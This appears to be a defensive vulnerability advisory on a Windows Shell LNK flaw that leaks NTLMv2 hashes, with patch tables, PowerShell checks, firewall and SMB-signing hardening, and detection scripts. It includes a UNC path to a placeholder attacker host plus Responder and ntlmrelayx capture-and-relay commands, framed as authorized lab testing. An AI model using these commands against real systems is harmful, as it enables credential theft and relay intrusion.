Vulnerability Analysis

CVE-2026-32202: Zero-Click Windows Shell Flaw Leaking NTLM Credentials in the Wild

Executive Summary

CVE-2026-32202 is an actively exploited Windows Shell spoofing vulnerability that enables a zero-click credential theft attack: any Windows user who opens a folder containing a crafted LNK (shortcut) file will silently transmit their NTLMv2 password hash to an attacker-controlled server — no clicks, no prompts, no warnings. The flaw originates from an incomplete patch for a prior APT28-exploited zero-day (CVE-2026-21510), leaving a residual authentication coercion vector that Russian state-sponsored threat actors are actively weaponizing. Microsoft patched the issue on April 14, 2026 (Patch Tuesday) and CISA ordered federal agencies to apply the fix by May 12, 2026.


1. What Is This Vulnerability?

CVE-2026-32202 is a Windows Shell spoofing vulnerability rooted in how the Windows namespace parser resolves UNC (Universal Naming Convention) paths embedded in .LNK shortcut files. Windows Explorer automatically resolves folder contents and fetches file icons as a user browses a directory. A crafted LNK file can embed a UNC path pointing to an attacker-controlled SMB server:

\\attacker.com\share\payload.cpl

When Windows Shell encounters this path, it does not validate the network zone (Internet vs. trusted zone) before resolving it. The shell initiates a TCP connection to port 445 on the attacker's server and triggers an automatic NTLM authentication handshake — silently transmitting the victim's Net-NTLMv2 hash.

Root Cause: An Incomplete Patch

The story begins with CVE-2026-21510 and CVE-2026-21513 — two vulnerabilities exploited by APT28 (Fancy Bear, a Russian GRU-linked threat group) via weaponized LNK files distributed in spear-phishing campaigns. Microsoft's February 2026 patch addressed the remote code execution aspect of that original chain, but researchers at Akamai Security discovered the fix was incomplete: the February patch blocked direct RCE delivery but left untouched the authentication coercion mechanism that allows the shell to initiate outbound SMB connections to arbitrary UNC paths. This residual flaw became CVE-2026-32202.

Attack Vector

[Victim browses folder]
        ↓
[Explorer renders folder icons]
        ↓
[Malicious LNK file found → Shell resolves embedded UNC path]
        ↓
[TCP 445 connection opened to attacker server — no user prompt]
        ↓
[Windows initiates NTLM handshake automatically]
        ↓
[Net-NTLMv2 hash transmitted to attacker server]
        ↓
[Attacker captures hash → offline cracking OR relay attack]

The attack requires zero clicks. Merely navigating to a folder in Windows Explorer, or previewing the folder through an email client's attachment pane, is sufficient to trigger hash exfiltration.
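To sweep file shares for planted shortcuts, the Python scanner below (an added example written for this article, not a tool from the page, Microsoft or Akamai) walks the MS-SHLLINK layout implied above: it reads LinkFlags, skips the optional LinkTargetIDList and LinkInfo structures, decodes the StringData fields and reports any that begin with \\host. The .lnk it builds for itself is a constructed test fixture, and attacker.example is a placeholder host.

```python
"""Scan Shell Link (.lnk) files for UNC paths that Explorer would resolve over SMB."""
import struct
import sys

HEADER_SIZE = 0x4C                       # fixed ShellLinkHeader length (MS-SHLLINK 2.1)
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections follow LinkInfo in this fixed order; each is present only if its flag is set.
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a .lnk as {field_name: text}."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]        # LinkFlags sits after HeaderSize + CLSID
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:                   # IDListSize (2 bytes) + IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                            # LinkInfoSize counts the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters; no NUL terminator follows
        raw = data[pos + 2:pos + 2 + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += 2 + count * width
    return fields

def unc_hosts(fields: dict) -> dict:
    """Map each field holding a UNC path (\\\\host\\share\\...) to the host Explorer would contact."""
    return {name: value[2:].split("\\", 1)[0].lower()
            for name, value in fields.items() if value.startswith("\\\\")}

def build_sample_lnk(icon_path: str) -> bytes:
    """Constructed fixture: header with HasIconLocation|IsUnicode and a single ICON_LOCATION string."""
    header = struct.pack("<I16sI", HEADER_SIZE, LINK_CLSID, 0x40 | IS_UNICODE)
    header += b"\x00" * (HEADER_SIZE - len(header))
    return header + struct.pack("<H", len(icon_path)) + icon_path.encode("utf-16-le")

if __name__ == "__main__":                               # usage: python <this file> a.lnk b.lnk ...
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = unc_hosts(parse_lnk_strings(fh.read()))
        for field, host in hits.items():
            print(f"{path}: {field} points at \\\\{host}")
```

A UNC target can also be carried in the LinkInfo CommonNetworkRelativeLink structure, which this minimal parser skips over; for a production sweep, extend it or pair it with a full MS-SHLLINK parser.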

Real-World Impact

APT28 has been observed deploying this technique in targeted campaigns against European government networks, defense contractors, and diplomatic entities since at least late March 2026. Microsoft updated the CVE-2026-32202 advisory on April 27, 2026 to confirm active exploitation after initially publishing the patch without an exploitation flag on April 14. CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on April 29, 2026.

In environments without SMB signing enforced, captured Net-NTLMv2 hashes can be used in NTLM relay attacks to authenticate directly against domain controllers, file servers, and internal web applications — potentially enabling full domain compromise without ever cracking a password.


2. Who Is Affected?

The vulnerability affects virtually every supported version of Windows that has not yet received the April 2026 cumulative update:

Platform          Affected Versions
Windows 10        1607 (LTSC), 1809, 21H2, 22H2
Windows 11        23H2, 24H2, 25H2, 26H1
Windows Server    2012, 2012 R2, 2016, 2019, 2022, 2025

High-risk configurations:

  • Any Windows host where SMB signing is not enforced (default in most domain environments for clients)
  • Environments where NTLM authentication is still permitted (common in legacy hybrid environments)
  • Systems with direct internet access where outbound TCP 445 is not blocked at the perimeter
  • Shared drives, network shares, or web-accessed file repositories where an attacker can plant a crafted LNK

3. How to Detect It (Testing)

Manual Testing Steps

  1. Check if your system is patched: Open PowerShell as Administrator and run:

    Get-HotFix | Where-Object { $_.HotFixID -in @('KB5083769','KB5082198','KB5082123','KB5082200','KB5082052','KB5082127','KB5082126','KB5082142','KB5082060','KB5082063') }
    

    If the relevant KB for your Windows version is absent, you are unpatched.

  2. Check patch level via WMI:

    (Get-ComputerInfo).OsHotFixes | Sort-Object InstalledOn -Descending | Select-Object -First 10
    

    Compare against the April 2026 cumulative update KB for your specific OS version.

  3. Verify SMB signing is enforced:

    Get-SmbServerConfiguration | Select-Object RequireSecuritySignature, EnableSecuritySignature
    Get-SmbClientConfiguration | Select-Object RequireSecuritySignature
    

    RequireSecuritySignature should be True on both server and client.

  4. Check for outbound SMB firewall rules:

    # Rule objects carry no port data; the port lives on the rule's associated port filter.
    Get-NetFirewallRule -Direction Outbound -Action Block -Enabled True |
        Where-Object { ($_ | Get-NetFirewallPortFilter).RemotePort -contains '445' }

    If this returns nothing, outbound SMB to arbitrary hosts is permitted.

Automated Scanning

Qualys / Tenable / Rapid7:

  • Qualys QID: 91960 (or search for CVE-2026-32202 in the vulnerability catalog)
  • Tenable Plugin: Check Tenable.io or Nessus for CVE-2026-32202 detections under Windows patch assessment
  • Rapid7 InsightVM: Scan for CVE-2026-32202 via authenticated Windows scan

Responder / ntlmrelayx (attacker simulation in authorized environments):

# Drop a crafted LNK into a test share, then listen:
sudo responder -I eth0 -w -r -f
# Or use impacket's ntlmrelayx to verify hash capture
sudo python3 ntlmrelayx.py -tf targets.txt --smb2support

Expected output (if vulnerable): NTLMv2 hash capture entries in Responder logs when any user browses the test folder.

Microsoft Defender for Endpoint (MDE) KQL:

DeviceNetworkEvents
| where RemotePort == 445
| where InitiatingProcessFileName == "explorer.exe"
| where RemoteIPType == "Public" or RemoteUrl !contains ".internal"
| project DeviceName, LocalIP, RemoteIP, RemoteUrl, Timestamp

Unexpected outbound SMB from explorer.exe to external or non-server IPs is a strong indicator of coercion.

Code Review Checklist

  • Audit any application that renders or previews LNK/shortcut files
  • Verify no web applications serve .lnk files from user-uploaded content without sanitization
  • Confirm network shares do not allow unauthenticated write access (an attacker needs write access to plant the LNK)
  • Review email gateway rules for .lnk attachments and ZIP archives containing LNK files

4. How to Fix It (Mitigation)

Step-by-Step Remediation

  1. Apply the April 2026 Patch Tuesday cumulative update — this is the official fix. The specific KB varies by Windows version:

    Windows Version            KB Article
    Windows 11 24H2 / 25H2     KB5083769
    Windows 11 23H2            KB5082198
    Windows 10 22H2            KB5082123
    Windows 10 21H2            KB5082200
    Windows 10 1809            KB5082052
    Windows Server 2025        KB5083769
    Windows Server 2022        KB5082127
    Windows Server 2019        KB5082060
    Windows Server 2016        KB5082126
    Windows Server 2012 R2     KB5082142
    Windows Server 2012        KB5082063

  2. Deploy via Windows Update or WSUS/MECM — confirm all endpoints in your estate have received the April 2026 update. Use your patch management console to generate a compliance report.

  3. Enable SMB signing as a defense-in-depth layer (see Configuration Hardening below).

  4. Block outbound SMB at the perimeter firewall — prevent TCP 445 to external IPs at your network edge.

  5. Prioritize internet-exposed systems and systems accessed by privileged users (domain admins, service accounts) for immediate patching.

Configuration Hardening

Enable SMB Signing via Group Policy (Recommended for all environments):

Navigate to: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options

Set both:

  • Microsoft network client: Digitally sign communications (always) → Enabled
  • Microsoft network server: Digitally sign communications (always) → Enabled

Or configure via PowerShell:

Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force

Block outbound SMB at the firewall:

# Block outbound TCP 445 (SMB) to non-internal ranges
New-NetFirewallRule -DisplayName "Block Outbound SMB" `
  -Direction Outbound -Protocol TCP -RemotePort 445 `
  -RemoteAddress Internet -Action Block

Restrict NTLM usage via Group Policy:

Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options

  • Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers → Deny all (Note: Test this carefully in your environment — legacy applications may require NTLM)

Block LNK files at email gateways and web proxies — configure your email security gateway to strip or quarantine .lnk file attachments, including within ZIP archives.


5. How to Test the Fix (Validation)

Regression Test Scenarios

  • Scenario A: After patching, drop a test LNK file containing a UNC path to an internal test server into a share. Browse to the folder — confirm no SMB authentication attempt is logged on the test server.
  • Scenario B: Using Responder in a lab environment (with authorization), confirm that browsing a folder containing the crafted LNK no longer results in hash capture after the patch is applied.
  • Scenario C: Verify no legitimate mapped drive or shortcut functionality is broken by the patch across standard user workflows.

Security Test Cases

Test Case 1: Verify SMB authentication coercion is blocked post-patch

  • Precondition: Apply KB for your Windows version; ensure Responder or equivalent listening tool is active on an internal test server
  • Steps: Create a .lnk file with TargetPath = \\test-server\capture\icon.ico; place in a shared folder; browse to the folder from the patched Windows endpoint
  • Expected Result: No NTLMv2 hash appears in Responder logs; Windows does not initiate SMB connection to the test server for icon resolution

Test Case 2: SMB signing prevents relay

  • Precondition: SMB signing enforced via GPO or PowerShell
  • Steps: Capture a hash (or simulate via responder) and attempt relay via ntlmrelayx
  • Expected Result: Relay fails with negotiation error due to signing requirement

Automated Tests

# Validate patch status across a fleet via PowerShell Remoting
$TargetKBs = @('KB5083769','KB5082198','KB5082123','KB5082200','KB5082052',
               'KB5082127','KB5082126','KB5082142','KB5082060','KB5082063')

$results = Invoke-Command -ComputerName (Get-ADComputer -Filter *).Name -ScriptBlock {
    param($kbs)
    $installed = (Get-HotFix).HotFixID
    $found = $kbs | Where-Object { $_ -in $installed }
    [PSCustomObject]@{
        ComputerName = $env:COMPUTERNAME
        PatchApplied = ($found.Count -gt 0)
        PatchID      = ($found -join ', ')
    }
} -ArgumentList (,$TargetKBs)

$results | Where-Object { -not $_.PatchApplied } | Export-Csv "unpatched-cve-2026-32202.csv" -NoTypeInformation
Write-Host "Unpatched systems exported to unpatched-cve-2026-32202.csv"

6. Prevention & Hardening

Best Practices

  • Enforce SMB signing universally — this single control eliminates the relay attack risk even if hashes are captured. It should be standard policy in any Active Directory environment. Windows 11 24H2+ now requires SMB signing by default, but older systems and servers need explicit configuration.
  • Disable NTLM where feasible, shift to Kerberos — modern Windows environments should minimize NTLM usage. Use the NTLM audit GPO (Network security: Restrict NTLM: Audit NTLM authentication in this domain) to identify and eliminate NTLM dependencies before blocking.
  • Maintain a rigorous patch cadence — CVE-2026-32202 illustrates the risk of delaying Patch Tuesday updates. An unpatched April 2026 system is exposed to an actively exploited APT28 campaign. Aim for a 7-14 day patch deployment SLA for critical and actively exploited vulnerabilities.
  • Block LNK files at the boundary — configure mail gateways (Microsoft Defender for Office 365, Proofpoint, Mimecast) to quarantine messages containing .lnk files or ZIP archives with .lnk contents. This is a common APT28 delivery vector.
  • Restrict write access to shared network drives — an attacker must be able to plant a malicious LNK in a location the victim will browse. Enforce least-privilege on file shares; prohibit unauthenticated or world-writable shares.

Monitoring & Detection

Microsoft Sentinel KQL (port the same logic to SPL for Splunk) — detect suspicious outbound SMB:

// Microsoft Sentinel
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort == 445
| where InitiatingProcessFileName =~ "explorer.exe"
| where not(ipv4_is_private(RemoteIP))
| summarize Count=count() by DeviceName, RemoteIP, RemoteUrl
| order by Count desc

Windows Event Log indicators:

  • Event ID 4776 (NTLM authentication attempt) — watch for failed NTLM authentications to unknown remote hosts
  • Event ID 5157 (Windows Filtering Platform connection blocked) — useful if outbound SMB block rule is in place
  • Sysmon Event ID 3 (Network connection) — filter for explorer.exe initiating connections on port 445 to non-internal IPs
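As an added example (not from the page), the Python below applies the logic of the Sysmon Event ID 3 bullet and the Sentinel query above to a constructed batch of Event ID 3 records: explorer.exe-initiated connections to TCP/445 outside RFC 1918, loopback and link-local space are flagged, with an allowlist for any public ranges the organisation legitimately owns. Field names follow Sysmon's Event ID 3 schema; the events, hostnames and addresses are constructed.

```python
"""Flag Sysmon Event ID 3 (Network connection) records where explorer.exe itself opens
TCP/445 to a host outside the organisation's address space."""
import ipaddress

# RFC 1918, loopback and link-local; mirrors what KQL's ipv4_is_private() treats as private.
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in
                   ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample events carrying the Sysmon Event ID 3 fields this check needs.
SAMPLE_EVENTS = [
    {"EventID": 3, "Computer": "WS-01", "Image": "C:\\Windows\\explorer.exe",
     "DestinationIp": "10.0.5.20", "DestinationPort": 445, "Initiated": True},    # internal file server
    {"EventID": 3, "Computer": "WS-01", "Image": "C:\\Windows\\explorer.exe",
     "DestinationIp": "203.0.113.45", "DestinationPort": 445, "Initiated": True},  # external: coercion
    {"EventID": 3, "Computer": "WS-02", "Image": "C:\\Windows\\System32\\svchost.exe",
     "DestinationIp": "203.0.113.45", "DestinationPort": 445, "Initiated": True},  # not explorer.exe
    {"EventID": 3, "Computer": "WS-02", "Image": "C:\\Windows\\explorer.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 445, "Initiated": False}, # inbound, not opened here
    {"EventID": 3, "Computer": "WS-03", "Image": "C:\\Windows\\explorer.exe",
     "DestinationIp": "198.51.100.9", "DestinationPort": 443, "Initiated": True},  # not SMB
]

def is_internal(ip: str, extra_ranges=()) -> bool:
    """True if ip falls in INTERNAL_RANGES or in operator-supplied ranges (e.g. an owned DMZ block)."""
    addr = ipaddress.ip_address(ip)
    return (any(addr in net for net in INTERNAL_RANGES)
            or any(addr in ipaddress.ip_network(r) for r in extra_ranges))

def smb_coercion_candidates(events, extra_internal=()):
    """Return (Computer, DestinationIp) pairs for explorer.exe-initiated SMB to external hosts."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 3 or not ev.get("Initiated"):
            continue                                    # only connections the endpoint itself opened
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if image != "explorer.exe" or ev.get("DestinationPort") != 445:
            continue
        if not is_internal(ev["DestinationIp"], extra_internal):
            hits.append((ev["Computer"], ev["DestinationIp"]))
    return hits

def count_by_device(hits):
    """Per-device count of flagged destinations, busiest first (the KQL summarize/order step)."""
    counts = {}
    for computer, _ in hits:
        counts[computer] = counts.get(computer, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))

if __name__ == "__main__":
    for computer, ip in smb_coercion_candidates(SAMPLE_EVENTS):
        print(f"{computer}: explorer.exe -> {ip}:445 (external SMB; review for CVE-2026-32202 coercion)")
```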

Alert on unexpected SMB relay indicators:

  • Multiple failed SMB authentication attempts from a single workstation to domain controllers within a short window (possible relay in progress)
  • NTLM authentications originating from IP addresses not associated with the source user account's known devices
